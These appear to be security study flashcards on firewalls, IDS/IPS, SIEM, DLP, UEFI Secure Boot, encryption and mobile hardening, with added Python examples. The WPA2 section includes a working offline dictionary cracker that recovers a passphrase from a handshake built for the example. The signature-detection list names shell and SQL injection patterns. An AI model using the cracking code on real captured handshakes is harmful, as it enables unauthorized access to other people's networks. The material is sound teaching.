Security Applications and Devices Flashcards
Software Firewalls
Software application that protects a single computer from unwanted network traffic by filtering what the host itself sends and receives. Examples of these host-based firewalls are: Windows Defender Firewall (Windows), PF and the older IPFW (macOS), and iptables or nftables (Linux). Many anti-malware suites also bundle a software firewall.
Intrusion Detection System (IDS)
A device or software application that monitors a system or network and analyzes the data passing through it in order to identify an incident or attack. Two types are HIDS (Host-based IDS) and NIDS (Network-based IDS).
A NIDS can spot reconnaissance and attack traffic in transit, often before a breach succeeds, while a HIDS acts as a second layer of defense by detecting what happens on the endpoint itself if the attack gets through. A plain IDS only alerts; taking action is the job of an IPS.
HIDS
Host-based IDS looks at behavior on a particular host (the endpoint itself), including which applications run, which files are accessed, and what the kernel and system logs record.
A HIDS analyzes log files for signs of malicious activity and lets you examine historical data to find activity patterns. This is particularly useful against experienced attackers who vary their intrusion methods to be less predictable and therefore harder to trace.
NIDS
Network-based IDS examines the data flowing between computers for unusual or known-bad activity. It allows for a fast response, because real-time traffic monitoring can trigger alerts while an attack is still happening.
Security Information and Event Management - SIEM
A platform that collects logs and alerts from many sources (NIDS and HIDS sensors, firewalls, servers, applications, and other network hardware), normalizes them, and correlates them to provide real-time analysis of security events across the environment.
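The correlation step is what distinguishes a SIEM from a log store: one failed login is noise, but five failures from the same address inside a minute followed by a success is an incident, and a NIDS sighting of that same address raises the severity. The following is an added example (not code from the original flashcards) that implements such a rule over a constructed, already-normalized event feed from a HIDS and a NIDS; the line format, event names and thresholds are assumptions for the example.

```python
"""Minimal SIEM-style correlation over events from two sensors.
Sample data is constructed for this example; the line format
"<ISO time> <sensor> <src_ip> <event>" is an assumed normalized format."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

SAMPLE_EVENTS = """\
2024-03-01T10:00:01 hids 203.0.113.7 ssh_login_failed
2024-03-01T10:00:03 hids 203.0.113.7 ssh_login_failed
2024-03-01T10:00:04 nids 203.0.113.7 portscan_detected
2024-03-01T10:00:05 hids 203.0.113.7 ssh_login_failed
2024-03-01T10:00:07 hids 203.0.113.7 ssh_login_failed
2024-03-01T10:00:09 hids 203.0.113.7 ssh_login_failed
2024-03-01T10:00:12 hids 203.0.113.7 ssh_login_success
2024-03-01T10:05:00 hids 198.51.100.2 ssh_login_failed
2024-03-01T10:05:30 hids 198.51.100.2 ssh_login_success
2024-03-01T11:00:00 hids 192.0.2.9 ssh_login_failed
2024-03-01T11:00:01 hids 192.0.2.9 ssh_login_failed
2024-03-01T11:00:02 hids 192.0.2.9 ssh_login_failed
2024-03-01T11:00:03 hids 192.0.2.9 ssh_login_failed
2024-03-01T11:00:04 hids 192.0.2.9 ssh_login_failed
2024-03-01T11:00:05 hids 192.0.2.9 ssh_login_failed
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+)$")


def parse_events(text):
    """Parse the normalized lines into dicts sorted by timestamp."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # malformed line: a real SIEM would count and flag these
        ts, sensor, ip, name = m.groups()
        events.append({"ts": datetime.fromisoformat(ts), "sensor": sensor,
                       "ip": ip, "event": name})
    events.sort(key=lambda e: e["ts"])
    return events


def correlate(events, threshold=5, window=timedelta(seconds=60)):
    """Rule: >= threshold failed logins from one IP within `window`, followed by a
    successful login from that IP -> 'brute_force_success'. If the NIDS also saw
    that IP port-scanning, the alert is escalated from medium to high."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    scanners = set()                # ips reported by the NIDS
    alerts = []
    for e in events:
        ip = e["ip"]
        if e["event"] == "portscan_detected":
            scanners.add(ip)
        elif e["event"] == "ssh_login_failed":
            q = failures[ip]
            q.append(e["ts"])
            while q and e["ts"] - q[0] > window:   # slide the window
                q.popleft()
        elif e["event"] == "ssh_login_success":
            q = failures[ip]
            while q and e["ts"] - q[0] > window:
                q.popleft()
            if len(q) >= threshold:
                alerts.append({"rule": "brute_force_success", "ip": ip,
                               "failures": len(q), "ts": e["ts"],
                               "severity": "high" if ip in scanners else "medium"})
            q.clear()   # a success resets the counter for that source
    return alerts


def run_sample():
    return correlate(parse_events(SAMPLE_EVENTS))


if __name__ == "__main__":
    for a in run_sample():
        print(a)
```

Only 203.0.113.7 fires: 198.51.100.2 had a single failure before succeeding, and 192.0.2.9 hammered the host but never got in (that would be a separate, lower-severity "brute force attempt" rule). The window is tracked per source so one noisy address cannot hide another.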
Signature-based Detection Method
A known pattern, typically a specific string of bytes (or a hash or regular expression) taken from a known attack, triggers an alert. Reliable for attacks it has signatures for, but it cannot detect a new attack that has no signature yet.
Policy-based Detection Method
Relies on a specific declaration of the security policy (e.g. "No Telnet Authorized"): any traffic that violates the declared policy triggers an alert, whether or not it matches a known attack.
Anomaly-based Detection Method
Analyzes the current traffic against an established baseline of normal behavior and triggers an alert if it falls outside the statistical norm. It can catch novel attacks, but the baseline must be learned on clean traffic, and legitimate changes in behavior produce false positives.
True Positive Alert
Malicious activity is identified as an attack.
False Positive
Legitimate activity is identified as an attack.
True Negative
Legitimate activity is identified as legitimate traffic
False Negative Alert
Malicious activity is identified as legitimate traffic.
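The three detection methods above and the four alert outcomes are easiest to understand side by side: run each detector over the same labelled traffic and count how often it was right. The following is an added example (not code from the original flashcards) that does this over a constructed set of flows; the signature list, the "no Telnet" policy expressed as a forbidden port, the size-based baseline and the z-score cut-off are all assumptions made for the example.

```python
"""Signature-, policy- and anomaly-based detection over constructed sample
flows, scored as true/false positives and negatives against known labels."""
import statistics
from dataclasses import dataclass


@dataclass
class Flow:
    dst_port: int
    payload: bytes
    nbytes: int        # bytes transferred in the flow
    malicious: bool    # ground truth, known only because the data is constructed


# Hypothetical signature list: byte patterns of known attacks (not a real rule set).
SIGNATURES = [b"' OR 1=1", b"/bin/sh", b"\x90\x90\x90\x90"]
# Assumed policy: "No Telnet authorized", expressed as a forbidden destination port.
FORBIDDEN_PORTS = {23}


def signature_detect(flow):
    """Alert when any known byte pattern appears in the payload."""
    return any(sig in flow.payload for sig in SIGNATURES)


def policy_detect(flow):
    """Alert when the flow violates the declared policy."""
    return flow.dst_port in FORBIDDEN_PORTS


class AnomalyDetector:
    """Baseline = mean and standard deviation of flow sizes seen during a
    learning period; anything more than `z` standard deviations above the
    mean is flagged."""

    def __init__(self, baseline_sizes, z=3.0):
        self.mean = statistics.mean(baseline_sizes)
        self.stdev = statistics.stdev(baseline_sizes)
        self.z = z

    def detect(self, flow):
        return (flow.nbytes - self.mean) / self.stdev > self.z


def score(detector, flows):
    """Count TP/FP/TN/FN for one detector over labelled flows."""
    counts = {"TP": 0, "FP": 0, "TN": 0, "FN": 0}
    for f in flows:
        alerted = detector(f)
        if alerted and f.malicious:
            counts["TP"] += 1
        elif alerted:
            counts["FP"] += 1
        elif f.malicious:
            counts["FN"] += 1
        else:
            counts["TN"] += 1
    return counts


# Constructed "normal" traffic used to learn the baseline (mean ~1206 bytes, stdev ~201).
BASELINE_SIZES = [1200, 1500, 900, 1300, 1100, 1400, 1000, 1250]

# Constructed flows to detect on, with ground-truth labels.
SAMPLE_FLOWS = [
    Flow(443, b"GET /index.html", 1250, False),                       # normal browsing
    Flow(80, b"id=1' OR 1=1--", 1300, True),                          # SQL injection attempt
    Flow(23, b"login: admin", 1150, True),                            # Telnet, forbidden by policy
    Flow(443, b"<encrypted>", 48000, True),                           # bulk exfiltration over TLS
    Flow(443, b"PUT /backup.tar", 26000, False),                      # legitimate nightly backup
    Flow(80, b"GET /blog/sqli-tutorial?q=' OR 1=1", 1000, False),     # article *about* SQLi
]


def evaluate_all():
    anomaly = AnomalyDetector(BASELINE_SIZES)
    return {"signature": score(signature_detect, SAMPLE_FLOWS),
            "policy": score(policy_detect, SAMPLE_FLOWS),
            "anomaly": score(anomaly.detect, SAMPLE_FLOWS)}


if __name__ == "__main__":
    for name, counts in evaluate_all().items():
        print(f"{name:10s} {counts}")
```

Each method has a characteristic blind spot: the signature engine misses the exfiltration (no pattern to match) and false-positives on a page that merely quotes an injection string; the policy rule is precise but only sees what the policy names; the anomaly detector is the only one to catch the exfiltration, and the only one to flag the legitimate backup. This is why the flashcards list all three and why a SIEM correlates them rather than trusting any one.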
IDS vs. IPS
Intrusion Detection Systems can only alert on and log suspicious activity, whereas an Intrusion Prevention System (IPS), which sits inline in the traffic path, can also block malicious activity before it reaches its target.
Pop Up Blockers
Most web browsers have the ability to block JavaScript-created pop-ups.
Sometimes to allow a website to function, pop-ups need to be enabled.
Malicious actors can purchase ads through various ad networks (malvertising), so even a legitimate website can end up serving malicious pop-ups or redirects.
Data Loss Prevention - DLP
Monitors the data of a system while in use, in transit, or at rest to detect (and, where configured, block) attempts to exfiltrate or steal the data.
DLP can be in the form of software or hardware solutions.
Endpoint DLP System
Software-based client that monitors the data in use on a computer and can stop a file transfer or alert an admin of the occurrence.
Network DLP System
Software or hardware-based solution that is installed on the perimeter of the network to inspect data in transit.
Storage DLP System
Software installed on servers in the datacenter to inspect the data at rest.
Cloud DLP System
Cloud software as a service that protects data being stored in cloud services.
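Whatever form a DLP system takes, its core is content inspection: deciding whether a blob of data contains something the policy says must not leave. The following is an added example (not code from the original flashcards) of the check an endpoint DLP agent would run before allowing a file transfer, over constructed sample text; the detector set (card numbers validated with the Luhn check so that random digit strings do not fire, US SSN format, and a classification marker word) is an assumption chosen for the example.

```python
"""Content inspection for an endpoint DLP decision. Sample documents are constructed."""
import re

# Candidate card numbers: 13-19 digits with optional space/dash separators.
PAN_RE = re.compile(r"\b(?:\d[ -]?){12,18}\d\b")
# US SSN shape, excluding area/group/serial values that are never issued.
SSN_RE = re.compile(r"\b(?!000|666|9\d\d)\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b")
# Assumed classification marker that the example policy forbids exporting.
MARKER_RE = re.compile(r"\bCONFIDENTIAL\b")


def luhn_valid(digits):
    """Luhn checksum: true for a structurally valid card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def mask_pan(digits):
    return digits[:4] + "*" * (len(digits) - 8) + digits[-4:]


def scan(text):
    """Return a list of findings; values are masked so the alert itself does not leak data."""
    findings = []
    for m in PAN_RE.finditer(text):
        digits = re.sub(r"[ -]", "", m.group(0))
        if 13 <= len(digits) <= 19 and luhn_valid(digits):
            findings.append({"kind": "pan", "value": mask_pan(digits), "pos": m.start()})
    for m in SSN_RE.finditer(text):
        findings.append({"kind": "ssn", "value": "***-**-" + m.group(0)[-4:], "pos": m.start()})
    for m in MARKER_RE.finditer(text):
        findings.append({"kind": "marker", "value": m.group(0), "pos": m.start()})
    return findings


def inspect_transfer(text):
    """Endpoint DLP decision: (allowed, findings). Any finding blocks the transfer."""
    findings = scan(text)
    return len(findings) == 0, findings


if __name__ == "__main__":
    # Constructed sample documents.
    docs = {
        "invoice.txt": "Invoice: card 4111 1111 1111 1111 exp 12/27, SSN 123-45-6789",
        "order.txt": "ref 4111-1111-1111-1112 order 20240301",   # fails Luhn: not a card
        "memo.txt": "CONFIDENTIAL: Q3 roadmap attached",
    }
    for name, body in docs.items():
        allowed, found = inspect_transfer(body)
        print(f"{name}: {'ALLOW' if allowed else 'BLOCK'} {found}")
```

The Luhn check is what keeps the false-positive rate tolerable; without it every 16-digit order or tracking number would block a transfer and users would quickly demand the agent be switched off. A production DLP engine adds file-type parsing (the text above has to be extracted from PDFs, spreadsheets and archives first) and fingerprinting of specific protected documents, but the decision structure is the same.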
BIOS and UEFI
Firmware that initializes the hardware when the computer powers on, provides the basic instructions for how to accept input and send output, and then hands control to the operating system's boot loader.
BIOS - Basic Input/Output System
UEFI - Unified Extensible Firmware Interface
UEFI is the modern replacement for the legacy BIOS; the term "BIOS" is still used loosely to refer to either, and both are secured in similar ways.
Securing the BIOS
- Flash the BIOS/UEFI firmware to the latest vendor version (and keep it updated).
- Use a BIOS (supervisor/setup) password so the settings cannot be changed without authorization.
- Configure the BIOS boot order, removing any unneeded devices (e.g. USB and network boot).
- Disable the external ports and devices that are not needed.
- Enable the Secure Boot option so that only signed boot loaders and operating systems can load.
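Enabling Secure Boot in the setup menu is only half the job; a hardening baseline should verify from the running OS that it is actually enforcing. On Linux the firmware exposes its variables through efivarfs, where each file is a 4-byte little-endian attribute mask followed by the variable data, and the SecureBoot and SetupMode variables are each a single byte. The following is an added example (not code from the original flashcards) that parses that format and reads the two variables; the byte strings in the test are constructed, and the "setup mode" handling reflects that a platform still in setup mode is not enforcing signatures regardless of the SecureBoot flag.

```python
"""Verify Secure Boot enforcement by reading UEFI variables via efivarfs."""
import os
import struct

# EFI_GLOBAL_VARIABLE vendor GUID used by the SecureBoot and SetupMode variables.
EFI_GLOBAL_VARIABLE_GUID = "8be4df61-93ca-11d2-aa0d-00e098032b8c"
EFIVARS_DIR = "/sys/firmware/efi/efivars"


def parse_efivar(blob):
    """efivarfs file layout: 4-byte little-endian attribute bitmask, then variable data."""
    if len(blob) < 4:
        raise ValueError("truncated efivar")
    (attrs,) = struct.unpack("<I", blob[:4])
    return attrs, blob[4:]


def boolean_var(blob):
    """SecureBoot and SetupMode are single-byte variables: 1 = set, 0 = clear."""
    _, data = parse_efivar(blob)
    if len(data) != 1:
        raise ValueError(f"expected 1-byte variable, got {len(data)} bytes")
    return data[0] == 1


def secure_boot_state(secureboot_blob, setupmode_blob):
    """Enforcing only if SecureBoot == 1 and the platform is not in setup mode."""
    if boolean_var(setupmode_blob):
        return "setup mode"          # keys not enrolled / enforcement off
    return "enabled" if boolean_var(secureboot_blob) else "disabled"


def read_var(name, efivars_dir=EFIVARS_DIR):
    path = os.path.join(efivars_dir, f"{name}-{EFI_GLOBAL_VARIABLE_GUID}")
    with open(path, "rb") as f:
        return f.read()


if __name__ == "__main__":
    try:
        state = secure_boot_state(read_var("SecureBoot"), read_var("SetupMode"))
        print("Secure Boot:", state)
    except FileNotFoundError:
        print("No UEFI variables found (legacy BIOS boot, or efivarfs not mounted)")
```

On a distribution with shim installed, `mokutil --sb-state` reports the same information; on Windows the equivalent check is `Confirm-SecureBootUEFI` in an elevated PowerShell. Either way, treat "setup mode" as a finding, not as enabled.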
Securing Removable Media Storage
Encrypt files on removable media.
Use technical limitations on computer systems and their use of USB and other removable media (e.g. disable USB ports).
Create administrative controls such as policies (e.g. company policy prohibiting copy/export of data to removable storage devices).
Securing Network Attached Storage (NAS) and Storage Area Network (SAN)
Use data encryption.
Use proper authentication.
Log NAS access.
Disk Encryption
Encryption adds security, but at a performance cost (smaller with hardware-assisted AES or a self-encrypting drive).
Self-Encrypting Drive - Performs whole disk encryption by using embedded hardware.
Software encryption - Most commonly used type of encryption.
Trusted Platform Module (TPM) - Chip residing on the motherboard that securely stores encryption keys and can release the disk key only when the boot process measures as expected. If your motherboard doesn't have a TPM, full-disk encryption products such as BitLocker can use a USB drive holding a startup key instead.
Hardware Security Module (HSM) - Physical device that acts as a secure crypto-processor during the encryption process.
Endpoint Analysis
Anti-virus
Host-based IDS/IPS (HIDS/HIPS)
Endpoint Protection Platform (EPP)
Endpoint Detection and Response (EDR)
User and Entity Behavior Analytics (UEBA)
Endpoint Protection Platform
A software agent and monitoring system that performs multiple security tasks such as anti-virus, HIDS/HIPS, firewall, DLP, and file encryption.
Endpoint Detection and Response
A software agent that collects system data and logs for analysis by a monitoring system to provide early detection of threats, and gives analysts the telemetry to investigate and respond once one is found.
User and Entity Behavior Analytics
A system that can provide automated identification of suspicious activity by user accounts and computer hosts.
UEBA solutions are heavily dependent on advanced computing techniques like AI and machine learning.
Many companies are now marketing Advanced Threat Protection (ATP), Advanced Endpoint Protection (AEP), and NextGen AV (NGAV), which are hybrids of EPP, EDR, and UEBA.
Securing Wireless Devices
WiFi Protected Access 2 (WPA2), using AES-CCMP, was long the highest level of Wi-Fi security and is still the minimum acceptable; its successor WPA3 is stronger where supported. WEP and the original WPA (TKIP) should not be used.
AES - Advanced Encryption Standard (used by WPA2 in CCMP mode)
Bluetooth pairing creates a shared link key to encrypt the connection.
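The reason WPA2-Personal is only as strong as its passphrase is visible in how the keys are derived: the pre-shared key is PBKDF2 of the passphrase and SSID, the session key is derived from it plus values sent in the clear during the 4-way handshake, and the handshake's MIC lets anyone who captured it test passphrase guesses offline. The following is an added example (not code from the original flashcards) that implements the derivation with the standard library and runs a dictionary attack against a handshake constructed for the example; the MAC addresses, nonces and EAPOL frame are hypothetical, while the PSK test vector (passphrase "password", SSID "IEEE") is the published IEEE 802.11i Annex H value.

```python
"""WPA2-Personal (PSK) key derivation and an offline passphrase-guessing attack
against a captured 4-way handshake. The handshake is constructed, not a real capture."""
import hashlib
import hmac


def wpa2_psk(passphrase, ssid):
    """PMK/PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf512(key, label, data):
    """IEEE 802.11 PRF-512: concatenated HMAC-SHA1 outputs, truncated to 64 bytes."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK binds the PMK to both MAC addresses and both handshake nonces."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2/CCMP (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame
    with its MIC field zeroed, truncated to 16 bytes. KCK = first 16 bytes of PTK."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


# Constructed handshake parameters (hypothetical MACs and nonces).
SSID = "IEEE"
AP_MAC = bytes.fromhex("00112233aabb")
STA_MAC = bytes.fromhex("66778899ccdd")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
# Stand-in for message 2 of the handshake with the MIC field already zeroed;
# a real capture carries the full EAPOL-Key frame.
EAPOL_MSG2 = b"\x02\x03\x00\x75\x02\x01\x0a" + b"\x00" * 112


def make_handshake(passphrase):
    """Produce what an attacker sees on the air: SSID, MACs, nonces, EAPOL frame, MIC."""
    ptk = derive_ptk(wpa2_psk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"ssid": SSID, "ap_mac": AP_MAC, "sta_mac": STA_MAC, "anonce": ANONCE,
            "snonce": SNONCE, "eapol": EAPOL_MSG2, "mic": eapol_mic(ptk[:16], EAPOL_MSG2)}


def crack(handshake, wordlist):
    """Offline dictionary attack: a guess is confirmed when its derived KCK
    reproduces the captured MIC. No further interaction with the network is needed."""
    for guess in wordlist:
        pmk = wpa2_psk(guess, handshake["ssid"])
        ptk = derive_ptk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                         handshake["anonce"], handshake["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], handshake["eapol"]), handshake["mic"]):
            return guess
    return None


if __name__ == "__main__":
    hs = make_handshake("password")
    print("recovered passphrase:", crack(hs, ["letmein", "Password1", "password"]))
```

The 4096 PBKDF2 iterations slow each guess down but do not change the picture: a short or dictionary passphrase falls to a captured handshake plus a GPU. The defenses are a long random passphrase (or WPA2-Enterprise with per-user credentials) and, where the hardware supports it, WPA3, whose SAE handshake is designed so that a captured exchange cannot be used for offline guessing.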
Mobile Malware
Always update your phone's operating system.
Only install apps from the official App Store or Play Store.
Do not jailbreak/root the device; doing so removes the OS sandbox protections that the official-store model relies on.
SIM Cloning and ID Theft
SIM = Subscriber Identity Module
Cloning allows two phones to use the same subscriber identity, so the attacker can receive the victim's calls and text messages (including SMS verification codes) and make calls billed to the victim.
SIM v1 cards (using the original COMP128v1 authentication algorithm) are easy to clone; SIM v2 and later are much harder.
Be careful where you post phone numbers.
Bluetooth Attacks
Bluejacking - Sending of unsolicited messages to Bluetooth-enabled devices. Sends information to a device.
Bluesnarfing - Unauthorized access of information from a wireless device over a Bluetooth connection. Takes information from a device.
Mobile Device Theft
Always ensure your device is backed up.
Don’t try to recover your device alone if it is stolen.
Remote Lock - Requires PIN or password before someone can use the device.
Remote Wipe - Remotely erases the contents of the device to ensure the information is not recoverable.
Mobile App Security
Only install apps from official app stores.
Use TLS for email apps.
Employ an MDM solution.
Turn location services off when not needed to protect privacy.
Geotagging should be considered when developing organization security policies.
Bring Your Own Device
BYOD introduces a lot of security issues to consider.
Use of Storage Segmentation is advised to create a clear separation between personal and company data on a single device.
Using a MDM solution can prevent certain apps from being installed on the device.
Hardening Mobile Devices
Update your device OS to the latest version.
Install Antivirus.
Train users on proper security and use of the device.
Only install apps from the official app stores.
Do not root or jailbreak your devices.
Only use v2 SIM cards with your devices.
Turn off all unnecessary features.
Turn on encryption for voice and data.
Use strong passwords or biometrics.
Don’t allow BYOD.
Ensure your organization has a good security policy for mobile devices.
Hardening
The act of configuring an operating system securely by updating it, creating rules and policies to govern it, and removing unnecessary applications and services.
Mitigate risk by minimizing vulnerabilities to reduce exposure to threats.